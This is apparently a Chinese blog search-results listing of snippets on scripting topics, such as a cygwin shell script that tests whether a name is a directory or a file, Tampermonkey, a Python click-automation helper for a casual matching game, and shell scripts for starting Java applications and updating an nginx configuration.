  • 今天突然想windows下利用cygwin执行一个脚本判断输入的文件名是目录还是文件,代码很简单,如下 #!/bin/sh read -p "enter file name:" filename path=$filename if [ -d $path ] then echo "$filename is the ...
  • 使用tampermonkey 脚本愉快上网

    千次阅读 2019-02-12 19:14:36
    :下载tampermonkey插件 tampermonkey对于大部分浏览器均可以使用,如谷歌、火狐、360浏览器、Edge等。下载该插件均可以在其扩展中心下载,这里以windows10自带的Edge为例: 在应用商店搜索tampermonkey下载...
  • [Python] 用python做一个游戏辅助脚本,完整思路

    万次阅读 多人点赞 2019-06-17 09:01:15
    [Python] 用python做一个游戏辅助脚本,完整思路 一、说明  简述:本文将以4399小游戏《宠物连连看经典版2》作为测试案例,通过识别小图标,模拟鼠标点击,快速完成配对。对于有兴趣学习游戏脚本的同学有一定的...
  • 101shell脚本

    千次阅读 多人点赞 2017-11-30 22:11:55
    本文用于记录学习和日常中使用过的shell脚本脚本1】打印形状 打印等腰三角形、直角三角形、倒直角三角形、菱形 #!/bin/bash # 等腰三角形 read -p "Please input the length: " n for i in `seq 1 $n` do for ...
  • 工作中经常要和服务器、数据库这些打交道,有些小功能例如:服务监控、数据监控等用java往往无处下手,即使能做也要花费很长的时间,身边好几同事都会Python,面对这些需求他们往往优先选择Python来实现,又快又...
  • 台动态ip的测试机器,上面部署Nginx,然后每次重启机器后ip总会变动,需要改nginx.conf配置文件和重启nginx服务。 所以要解决这问题,想到的解决...、python脚本 # -*- coding:UTF-8 -*- import re impo...
  • Linux下的SHELL脚本常以 *.sh 为后缀,和Windows下的批处理脚本 *.bat *.cmd...在Linux下新建一个文本文件,命名为test.sh,并输入以下内容: #!/bin/sh echo hello,world 【注】 - 第1行是必须的,用以表示本...
  • python脚本编写

    万次阅读 多人点赞 2019-03-29 22:37:20
    一般人看到script这英文单词,或许想到的更多的是:电影的剧本,就是段段的脚本,所组成的。电影剧本的脚本,决定了电影中的人和物,都做哪些事情,怎么做。而计算机中的脚本,决定了:计算机中的操作系统和各种...
  • Linux 下使用Shell脚本启动Java应用

    万次阅读 2018-05-06 19:04:59
    这个脚本是在网上找到一个挺好的通用 shell 脚本。只需要修改一些配置变量,就可以用来做起动脚本了。并且除了能起动、还支持关闭、重启、查看是否正在运行的功能。 start 函数中,nohup 部分其实也可以提出来放入...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 39,896
精华内容 15,958
关键字:

编辑一个windows脚本使用判断